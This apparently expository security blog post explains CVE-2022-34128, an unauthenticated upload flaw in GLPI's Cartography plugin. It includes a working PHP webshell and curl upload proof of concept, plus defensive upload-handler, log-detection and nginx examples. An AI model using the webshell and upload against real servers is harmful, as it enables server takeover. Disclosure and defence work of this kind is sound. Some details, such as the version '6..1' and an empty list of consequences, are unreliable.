CVE-2022-34128 - How a Bug in GLPI Cartography Plugin Lets Hackers Run Code on Your Server
If you’re running GLPI to manage your IT assets, there’s something important you need to know. A dangerous security vulnerability named CVE-2022-34128 was found in a widely-used GLPI plugin called Cartography (also known as "positions"). If you don’t fix it, attackers can take control of your GLPI server by running any code they want—putting your whole IT management at risk.
In this post, I’ll break down what the bug is, how it works, and show a sample exploit so you see how serious it is. I’ll keep the language simple and straightforward so anyone can understand it.
What Is GLPI and What’s Cartography?
GLPI is a popular open-source IT management system. It lets you track devices, assets, tickets, and much more. Cartography (or "positions") is a plugin that helps you map your devices and positions on a plan or map.
If you want more details:
- GLPI Official Site
- Cartography Plugin page
What is CVE-2022-34128?
The bug is a remote code execution (RCE) vulnerability in Cartography plugin versions before 6..1. It comes down to front/upload.php, the plugin script that handles file uploads: it accepts files without properly checking their type or content, and when the web server later serves one of those files as PHP, the code inside it runs.
If exploited, anyone could run their own PHP scripts on your server, without needing to log in.
Official advisory and sources:
- GLPI Security Advisory
- Vulnerability Details on NVD
Where’s the Problem?
The vulnerable script is:
/plugins/cartography/front/upload.php
Instead of strictly checking what is uploaded (extension, content type, file name), this script accepts files containing PHP code and stores them where the web server can serve them. That lets an attacker upload, say, a webshell.
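To make the contrast concrete, here is what a strict upload handler for a plan/map image endpoint looks like. This is an added example, not the Cartography plugin's code or the project's fix; the function names, the upload directory and the use of GLPI's Session::checkLoginUser(), Session::checkCSRF() and GLPI_PLUGIN_DOC_DIR are assumptions to confirm against the GLPI version you run. The three properties the vulnerable script lacked are all present: only allow-listed image types get through, the server (not the client) picks the file name, and the file is stored where nothing will ever execute it.

```php
<?php
// Added example, not the Cartography plugin's own code: a strict upload
// handler for a plan/map image endpoint. Names marked as assumed below are
// not from the original post.

declare(strict_types=1);

// Extension => the MIME type the file content must actually have.
const ALLOWED_TYPES = ['png' => 'image/png', 'jpg' => 'image/jpeg',
                       'jpeg' => 'image/jpeg', 'gif' => 'image/gif'];
const MAX_BYTES = 5 * 1024 * 1024;

/**
 * Validate one $_FILES entry. Returns null if acceptable, else the reason.
 */
function validate_upload(array $file): ?string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        return 'upload failed or no file sent';
    }
    if (!is_uploaded_file($file['tmp_name'])) {
        return 'not a file uploaded via HTTP';
    }
    if ($file['size'] > MAX_BYTES) {
        return 'file too large';
    }
    // Decide on exactly one extension, lower-cased; "shell.php.png" and
    // "shell.php" both fail here.
    $parts = explode('.', basename((string) $file['name']));
    if (count($parts) !== 2 || $parts[0] === '') {
        return 'file name must have exactly one extension';
    }
    $ext = strtolower($parts[1]);
    if (!isset(ALLOWED_TYPES[$ext])) {
        return "extension .$ext is not allowed";
    }
    // Check the content's MIME type, not the client-supplied Content-Type header.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if ($mime !== ALLOWED_TYPES[$ext]) {
        return "content is $mime, not " . ALLOWED_TYPES[$ext];
    }
    // Must decode as an image. A valid image with PHP appended still passes
    // this check, which is why store_upload() never lets the file be executable.
    if (@getimagesize($file['tmp_name']) === false) {
        return 'file is not a decodable image';
    }
    return null;
}

/**
 * Move a validated upload into $uploadDir under a random server-chosen name.
 * $uploadDir is assumed to be outside the document root (or served with PHP
 * execution disabled), so nothing stored there can be run as a script.
 */
function store_upload(array $file, string $uploadDir): string
{
    $ext  = strtolower(pathinfo((string) $file['name'], PATHINFO_EXTENSION));
    $dest = rtrim($uploadDir, '/') . '/' . bin2hex(random_bytes(16)) . '.' . $ext;
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        throw new RuntimeException('could not store upload');
    }
    chmod($dest, 0640);   // readable by the web user, never executable
    return $dest;
}

// Endpoint glue. Session::checkLoginUser(), Session::checkCSRF() and
// GLPI_PLUGIN_DOC_DIR are GLPI's own; confirm them against your GLPI version.
if (PHP_SAPI !== 'cli' && ($_SERVER['REQUEST_METHOD'] ?? '') === 'POST') {
    Session::checkLoginUser();      // the original bug needed no login at all
    Session::checkCSRF($_POST);     // reject cross-site form posts
    $err = validate_upload($_FILES['file'] ?? []);
    if ($err !== null) {
        http_response_code(400);
        exit("upload rejected: $err");
    }
    // Per-plugin data directory outside the web root (assumed layout).
    $stored = store_upload($_FILES['file'], GLPI_PLUGIN_DOC_DIR . '/cartography');
    echo 'stored as ' . basename($stored);
}
```

The design point is that the extension and MIME checks are only the first line; the decisive protection is that the stored file has a name the client never chose and lives in a directory the web server will not hand to the PHP interpreter, so even a polyglot that passes every content check is just an image.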
Example Exploit
Let’s create a small, easy-to-understand example. This is how an attacker could upload malicious code using curl—just as a proof-of-concept:
1. Create a simple PHP webshell

```php
<?php
// save as shell.php
system($_GET['cmd']);
```

This very short code lets you run system commands via your browser: ?cmd=ls will list the files, for example.

2. Upload it with curl from the attacker's PC

```sh
curl -F "file=@shell.php" http://your-glpi-server/plugins/cartography/front/upload.php
```

*Note: The real parameter name for the file may vary based on plugin version or configuration.*
3. Access the shell
After upload, the file is somewhere on the server—often accessible through the web server’s public directory. If, for example, the file became accessible at:
http://your-glpi-server/plugins/cartography/uploads/shell.php?cmd=whoami
Requesting that URL would execute whoami on your server, and return the result.
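From the defender's side, the sequence above leaves a recognisable trace in the web server's access log: a POST to front/upload.php from some client, followed by a request for a .php file under the plugin tree that is not one of the plugin's own scripts. The script below is an added example, not part of the original post, that scans combined-format log lines for exactly that pattern; the log lines are constructed for the example (documentation-range IPs, made-up timestamps), and the assumption that the plugin's own scripts live only under front/, ajax/ and inc/ is mine.

```php
<?php
// Added example, not from the original post: flag the upload-then-request
// pattern in combined-format access logs. Sample lines are constructed.

declare(strict_types=1);

const UPLOAD_ENDPOINT = '/plugins/cartography/front/upload.php';
// Any .php under the plugin tree outside its own script directories (assumed
// to be front/, ajax/, inc/) is treated as a possible uploaded webshell.
const PLUGIN_TREE_RE = '~^/plugins/cartography/(?!(front|ajax|inc)/)[^?]*\.php$~i';
// ip, timestamp, method, target, status from a combined log line.
const LOG_RE = '/^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3})/';

/**
 * Returns one finding per suspicious event:
 *   upload_attempt : any POST to the vulnerable endpoint
 *   shell_request  : a request for a non-plugin .php file under the plugin
 *                    tree from a client that POSTed to the endpoint earlier
 */
function find_suspicious(array $lines): array
{
    $uploaders = [];   // client IP => timestamp of its first upload POST
    $findings  = [];
    foreach ($lines as $line) {
        if (!preg_match(LOG_RE, $line, $m)) {
            continue;   // not a combined-format line
        }
        [, $ip, $ts, $method, $target, $status] = $m;
        $path = strtok($target, '?');   // match on the path without the query

        if ($method === 'POST' && $path === UPLOAD_ENDPOINT) {
            $uploaders[$ip] ??= $ts;
            $findings[] = ['kind' => 'upload_attempt', 'ip' => $ip, 'ts' => $ts,
                           'path' => $path, 'status' => (int) $status];
        } elseif (isset($uploaders[$ip]) && preg_match(PLUGIN_TREE_RE, $path)) {
            $findings[] = ['kind' => 'shell_request', 'ip' => $ip, 'ts' => $ts,
                           'path' => $target, 'status' => (int) $status];
        }
    }
    return $findings;
}

// Constructed sample log (not real traffic).
$sample = [
    '192.0.2.10 - - [16/Apr/2023:03:20:01 +0000] "GET /front/login.php HTTP/1.1" 200 5321 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [16/Apr/2023:03:21:10 +0000] "POST /plugins/cartography/front/upload.php HTTP/1.1" 200 34 "-" "curl/7.68.0"',
    '198.51.100.7 - - [16/Apr/2023:03:21:12 +0000] "GET /plugins/cartography/uploads/shell.php?cmd=whoami HTTP/1.1" 200 18 "-" "curl/7.68.0"',
    '192.0.2.10 - - [16/Apr/2023:03:22:00 +0000] "GET /plugins/cartography/front/example.php HTTP/1.1" 200 9876 "-" "Mozilla/5.0"',
];

if (PHP_SAPI === 'cli') {
    // Pass a real access log as the first argument; otherwise the sample is used.
    $lines = $argc > 1 ? file($argv[1], FILE_IGNORE_NEW_LINES) : $sample;
    foreach (find_suspicious($lines) as $f) {
        printf("%-15s %-26s %-14s %s (HTTP %d)\n",
               $f['kind'], $f['ts'], $f['ip'], $f['path'], $f['status']);
    }
}
```

Run it as `php detect_upload.php /var/log/nginx/access.log` (the file name is yours to choose). Any upload_attempt hit on a server that has not yet been patched deserves a look at the plugin's upload directory for files that should not be there, and the per-client pairing with a shell_request is what separates a curious scanner from a successful compromise.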
Why Is This Dangerous?
Because attackers don’t need a username or password—*nobody* is safe unless you upgrade. With RCE, an attacker can:
How to Protect Yourself
The fix is simple:
- Update to the latest version of the Cartography plugin (release page and plugin directory linked below).
- Remove or disable the Cartography plugin.
- Block access to /plugins/cartography/front/upload.php using your web server configuration (e.g., .htaccess, nginx config).

Links
- Cartography Release Page
- GLPI Plugin Directory
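For the web server side of that list, here is an nginx server block that both shuts the vulnerable endpoint and makes sure nothing already sitting in the plugin's upload directory can ever be executed. This is an added example, not configuration shipped by GLPI or the plugin; the document root, the PHP-FPM socket and the uploads path (which, as noted above, may differ per version) are assumptions to adjust for your install.

```nginx
# Added example, not from the GLPI or Cartography projects. Assumes GLPI is
# served by nginx from /var/www/glpi with PHP-FPM on the socket shown.

server {
    listen 80;
    server_name your-glpi-server;
    root /var/www/glpi;
    index index.php;

    # (1) Shut the vulnerable endpoint until the plugin is updated. An exact
    #     "=" location has the highest priority in nginx, so nothing below
    #     can re-enable it.
    location = /plugins/cartography/front/upload.php {
        deny all;
    }

    # (2) Whatever was already uploaded must never reach PHP. "^~" makes this
    #     prefix location win over the regex \.php$ location further down; the
    #     nested regex refuses script-like names outright, and anything else
    #     in the directory is served as a static file or 404.
    location ^~ /plugins/cartography/uploads/ {
        location ~* \.(php|phtml|phar)$ {
            return 403;
        }
        try_files $uri =404;
    }

    # (3) Normal PHP handling for the rest of GLPI.
    location ~ \.php$ {
        try_files $uri =404;
        include fastcgi_params;
        fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
        fastcgi_pass unix:/run/php/php-fpm.sock;
    }

    location / {
        try_files $uri $uri/ /index.php$is_args$args;
    }
}
```

Check it with `nginx -t` and reload; then confirm that a request for the upload endpoint returns 403 and that a harmless test file named anything.php placed in the uploads directory is refused rather than executed. The ordering matters: without `^~`, the generic `\.php$` regex would still catch files under uploads/.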
Conclusion
CVE-2022-34128 is a critical vulnerability in the Cartography plugin for GLPI. It’s easy to exploit and can let attackers take over your server. All you need to do is update to the latest version of the Cartography plugin. Don’t put it off—this is about the security of all the assets and information you track with GLPI.
Other references:
- Exploit-DB entry
- NIST NVD CVE Detail
Stay safe, keep your software up-to-date!
*If you have questions or need help, drop a comment or reach out to the GLPI community.*
Timeline
Published on: 04/16/2023 03:15:00 UTC
Last modified on: 04/25/2023 18:21:00 UTC